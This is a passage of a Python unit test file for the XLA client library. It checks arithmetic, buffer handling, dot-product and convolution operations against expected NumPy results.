"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
btup = xla_client.Buffer.make_tuple([b0, b1], device=0)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testInvalidDevice(self):
t = np.array(1.)
with self.assertRaisesRegexp(
RuntimeError,
r"PyLocalBuffer::FromLiterals got bad device_ordinal: 100 "
r"\(num_local_devices=\d+\)"):
# TODO(skyewm): figure out how to test this with a Device
xla_client.Buffer.from_pyval(t, device=100)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
